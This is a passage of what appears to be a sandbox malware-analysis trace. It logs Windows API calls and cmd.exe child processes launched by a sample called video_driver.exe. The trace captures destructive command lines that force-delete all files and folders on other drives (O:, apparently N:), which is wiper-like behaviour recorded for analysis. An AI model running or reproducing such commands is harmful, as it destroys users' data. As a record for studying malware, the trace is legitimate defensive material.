_String2="ERRORLEVEL") returned 6 [0068.195] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.195] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.195] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.195] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.195] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.195] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.195] GetProcessHeap () returned 0x5d0000 [0068.195] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x54) returned 0x5e17c8 [0068.195] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fc30 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.195] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x22fc30, lpFilePart=0x22fc2c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22fc2c*="Desktop") returned 0x25 [0068.195] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.195] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f9ac | out: lpFindFileData=0x22f9ac*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5e5760 [0068.195] FindClose (in: hFindFile=0x5e5760 | out: hFindFile=0x5e5760) returned 1 [0068.196] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x22f9ac | out: lpFindFileData=0x22f9ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5e5760 [0068.196] FindClose (in: hFindFile=0x5e5760 | out: hFindFile=0x5e5760) returned 1 [0068.196] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.196] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x22f9ac | out: lpFindFileData=0x22f9ac*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5e5760 [0068.196] FindClose (in: hFindFile=0x5e5760 | out: hFindFile=0x5e5760) returned 1 [0068.196] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.196] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.196] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.196] GetProcessHeap () returned 0x5d0000 [0068.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4c70 | out: hHeap=0x5d0000) returned 1 [0068.196] GetEnvironmentStringsW () returned 0x5e4180* [0068.196] GetProcessHeap () returned 0x5d0000 [0068.197] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb36) returned 0x5e5fa0 [0068.197] FreeEnvironmentStringsW (penv=0x5e4180) returned 1 [0068.197] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.197] GetProcessHeap () returned 0x5d0000 [0068.197] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e17c8 | out: hHeap=0x5d0000) returned 1 [0068.197] GetProcessHeap () returned 0x5d0000 [0068.197] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400e) returned 0x5e6ae0 [0068.198] GetProcessHeap () returned 0x5d0000 [0068.198] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xa0) returned 0x5e2e50 [0068.198] GetProcessHeap () returned 0x5d0000 [0068.198] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6ae0 | out: hHeap=0x5d0000) returned 1 [0068.198] GetConsoleOutputCP () returned 0x1b5 [0068.198] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.199] GetUserDefaultLCID () returned 0x409 [0068.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0068.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fd70, cchData=128 | out: lpLCData="0") returned 2 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fd70, cchData=128 | out: lpLCData="0") returned 2 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fd70, cchData=128 | out: lpLCData="1") returned 2 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0068.200] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0068.200] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0068.202] GetProcessHeap () returned 0x5d0000 [0068.202] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20c) returned 0x5e2ef8 [0068.202] GetConsoleTitleW (in: lpConsoleTitle=0x5e2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0068.202] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.202] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0068.202] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0068.202] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0068.203] GetProcessHeap () returned 0x5d0000 [0068.203] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400a) returned 0x5e6ae0 [0068.203] GetProcessHeap () returned 0x5d0000 [0068.203] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4008) returned 0x5eaaf8 [0068.204] GetProcessHeap () returned 0x5d0000 [0068.204] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1a) returned 0x5e57e0 [0068.204] GetEnvironmentVariableW (in: lpName="p IN (\"N", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.204] _wcsicmp (_String1="p IN (\"N", _String2="CD") returned 13 [0068.204] _wcsicmp (_String1="p IN (\"N", _String2="ERRORLEVEL") returned 11 [0068.204] _wcsicmp (_String1="p IN (\"N", _String2="CMDEXTVERSION") returned 13 [0068.204] _wcsicmp (_String1="p IN (\"N", _String2="CMDCMDLINE") returned 13 [0068.204] _wcsicmp (_String1="p IN (\"N", _String2="DATE") returned 12 [0068.204] _wcsicmp (_String1="p IN (\"N", _String2="TIME") returned -4 [0068.204] _wcsicmp (_String1="p IN (\"N", _String2="RANDOM") returned -2 [0068.204] _wcsicmp (_String1="p IN (\"N", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.204] GetProcessHeap () returned 0x5d0000 [0068.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e57e0 | out: hHeap=0x5d0000) returned 1 [0068.204] GetProcessHeap () returned 0x5d0000 [0068.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5eaaf8 | out: hHeap=0x5d0000) returned 1 [0068.204] GetProcessHeap () returned 0x5d0000 [0068.204] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4008) returned 0x5eaaf8 [0068.204] GetProcessHeap () returned 0x5d0000 [0068.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5eaaf8 | out: hHeap=0x5d0000) returned 1 [0068.204] GetProcessHeap () returned 0x5d0000 [0068.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6ae0 | out: hHeap=0x5d0000) returned 1 [0068.205] _wcsicmp (_String1="if", _String2=")") returned 64 [0068.205] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0068.205] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0068.205] _wcsicmp (_String1="IF", _String2="if") returned 0 [0068.205] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0068.205] GetProcessHeap () returned 0x5d0000 [0068.205] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x58) returned 0x5e3110 [0068.205] GetProcessHeap () returned 0x5d0000 [0068.205] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe) returned 0x5dffc0 [0068.206] GetProcessHeap () returned 0x5d0000 [0068.206] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x20) returned 0x5e57e0 [0068.206] GetProcessHeap () returned 0x5d0000 [0068.206] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e57e0, Size=0x16) returned 0x5e1800 [0068.206] GetProcessHeap () returned 0x5d0000 [0068.206] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5e1800) returned 0x16 [0068.206] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0068.207] GetProcessHeap () returned 0x5d0000 [0068.207] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x58) returned 0x5e3170 [0068.207] GetProcessHeap () returned 0x5d0000 [0068.207] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x14) returned 0x5e31d0 [0068.207] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0068.207] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0068.207] GetProcessHeap () returned 0x5d0000 [0068.207] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x5e31f0 [0068.208] GetProcessHeap () returned 0x5d0000 [0068.208] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1c) returned 0x5e57e0 [0068.208] GetProcessHeap () returned 0x5d0000 [0068.208] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e57e0, Size=0x14) returned 0x5e3210 [0068.208] GetProcessHeap () returned 0x5d0000 [0068.208] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5e3210) returned 0x14 [0068.208] _wcsicmp (_String1="del", _String2=")") returned 59 [0068.208] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0068.208] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0068.208] _wcsicmp (_String1="IF", _String2="del") returned 5 [0068.208] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0068.208] _wcsicmp (_String1="REM", _String2="del") returned 14 [0068.208] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0068.208] GetProcessHeap () returned 0x5d0000 [0068.208] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x58) returned 0x5e3230 [0068.208] GetProcessHeap () returned 0x5d0000 [0068.208] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x10) returned 0x5dffd8 [0068.209] GetProcessHeap () returned 0x5d0000 [0068.209] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x28) returned 0x5e3290 [0068.210] GetProcessHeap () returned 0x5d0000 [0068.210] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x58) returned 0x5e32c0 [0068.210] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0068.210] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0068.210] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0068.210] GetProcessHeap () returned 0x5d0000 [0068.210] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x58) returned 0x5e3320 [0068.210] GetProcessHeap () returned 0x5d0000 [0068.210] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x44) returned 0x5e3380 [0068.211] GetProcessHeap () returned 0x5d0000 [0068.211] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x14) returned 0x5e33d0 [0068.211] GetProcessHeap () returned 0x5d0000 [0068.211] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e33d0, Size=0x12) returned 0x5e33d0 [0068.211] GetProcessHeap () returned 0x5d0000 [0068.211] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5e33d0) returned 0x12 [0068.211] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0068.211] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0068.212] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0068.212] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0068.212] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0068.212] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0068.212] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0068.212] GetProcessHeap () returned 0x5d0000 [0068.212] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x5e33f0 [0068.214] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0068.214] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0068.214] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0068.214] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0068.214] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0068.214] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0068.214] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0068.214] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0068.214] GetProcessHeap () returned 0x5d0000 [0068.214] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x58) returned 0x5e3410 [0068.214] GetProcessHeap () returned 0x5d0000 [0068.214] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x14) returned 0x5e3470 [0068.215] GetProcessHeap () returned 0x5d0000 [0068.215] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x20) returned 0x5e57e0 [0068.216] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0068.218] GetFullPathNameW (in: lpFileName="N:", nBufferLength=0x208, lpBuffer=0x22fa60, lpFilePart=0x22f80c | out: lpBuffer="N:\\", lpFilePart=0x22f80c*=0x0) returned 0x3 [0068.218] wcsncmp (_String1="N:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -14 [0068.224] GetFileAttributesW (lpFileName="N:\\" (normalized: "n:")) returned 0xffffffff [0068.224] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.224] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.225] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.225] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.225] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.225] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.225] SetConsoleInputExeNameW () returned 0x1 [0068.225] GetConsoleOutputCP () returned 0x1b5 [0068.225] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.225] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.226] exit (_Code=0) Process: id = "59" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41e86000" os_pid = "0x2a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"O:\" del /f /s /q \"O:\" & FOR /D %p IN (\"O:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 87 os_tid = 0x634 [0068.341] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfd1c | out: lpSystemTimeAsFileTime=0x1cfd1c*(dwLowDateTime=0x68ba7c0, dwHighDateTime=0x1d62400)) [0068.341] GetCurrentProcessId () returned 0x2a8 [0068.341] GetCurrentThreadId () returned 0x634 [0068.341] GetTickCount () returned 0x1148814 [0068.341] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfd14 | out: lpPerformanceCount=0x1cfd14*=18847425513) returned 1 [0068.342] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0068.342] __set_app_type (_Type=0x1) [0068.342] __p__fmode () returned 0x770331f4 [0068.342] __p__commode () returned 0x770331fc [0068.342] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0068.342] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0068.343] GetCurrentThreadId () returned 0x634 [0068.343] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x634) returned 0x60 [0068.343] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.343] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0068.343] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.343] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.343] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfcac | out: phkResult=0x1cfcac*=0x0) returned 0x2 [0068.344] VirtualQuery (in: lpAddress=0x1cfce3, lpBuffer=0x1cfc7c, dwLength=0x1c | out: lpBuffer=0x1cfc7c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.344] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc7c, dwLength=0x1c | out: lpBuffer=0x1cfc7c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.344] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc7c, dwLength=0x1c | out: lpBuffer=0x1cfc7c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.344] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc7c, dwLength=0x1c | out: lpBuffer=0x1cfc7c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.344] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc7c, dwLength=0x1c | out: lpBuffer=0x1cfc7c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0068.344] GetConsoleOutputCP () returned 0x1b5 [0068.344] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.344] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0068.344] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.344] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.344] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.345] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.345] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.345] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.345] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.345] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.345] GetEnvironmentStringsW () returned 0x3820f8* [0068.345] GetProcessHeap () returned 0x370000 [0068.345] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xaca) returned 0x382bd0 [0068.345] FreeEnvironmentStringsW (penv=0x3820f8) returned 1 [0068.346] GetProcessHeap () returned 0x370000 [0068.346] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4) returned 0x381898 [0068.346] GetEnvironmentStringsW () returned 0x3820f8* [0068.346] GetProcessHeap () returned 0x370000 [0068.346] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xaca) returned 0x3836a8 [0068.346] FreeEnvironmentStringsW (penv=0x3820f8) returned 1 [0068.346] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec1c | out: phkResult=0x1cec1c*=0x68) returned 0x0 [0068.346] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x0, lpData=0x1cec28*=0x0, lpcbData=0x1cec20*=0x1000) returned 0x2 [0068.346] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x4, lpData=0x1cec28*=0x1, lpcbData=0x1cec20*=0x4) returned 0x0 [0068.346] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x0, lpData=0x1cec28*=0x1, lpcbData=0x1cec20*=0x1000) returned 0x2 [0068.346] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x4, lpData=0x1cec28*=0x0, lpcbData=0x1cec20*=0x4) returned 0x0 [0068.346] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x4, lpData=0x1cec28*=0x40, lpcbData=0x1cec20*=0x4) returned 0x0 [0068.346] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x4, lpData=0x1cec28*=0x40, lpcbData=0x1cec20*=0x4) returned 0x0 [0068.346] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x0, lpData=0x1cec28*=0x40, lpcbData=0x1cec20*=0x1000) returned 0x2 [0068.346] RegCloseKey (hKey=0x68) returned 0x0 [0068.346] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec1c | out: phkResult=0x1cec1c*=0x68) returned 0x0 [0068.347] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x0, lpData=0x1cec28*=0x40, lpcbData=0x1cec20*=0x1000) returned 0x2 [0068.347] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x4, lpData=0x1cec28*=0x1, lpcbData=0x1cec20*=0x4) returned 0x0 [0068.347] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x0, lpData=0x1cec28*=0x1, lpcbData=0x1cec20*=0x1000) returned 0x2 [0068.347] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x4, lpData=0x1cec28*=0x0, lpcbData=0x1cec20*=0x4) returned 0x0 [0068.347] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x4, lpData=0x1cec28*=0x9, lpcbData=0x1cec20*=0x4) returned 0x0 [0068.347] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x4, lpData=0x1cec28*=0x9, lpcbData=0x1cec20*=0x4) returned 0x0 [0068.347] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec24, lpData=0x1cec28, lpcbData=0x1cec20*=0x1000 | out: lpType=0x1cec24*=0x0, lpData=0x1cec28*=0x9, lpcbData=0x1cec20*=0x1000) returned 0x2 [0068.347] RegCloseKey (hKey=0x68) returned 0x0 [0068.347] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6e [0068.347] srand (_Seed=0x5eb34b6e) [0068.347] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"O:\" del /f /s /q \"O:\" & FOR /D %p IN 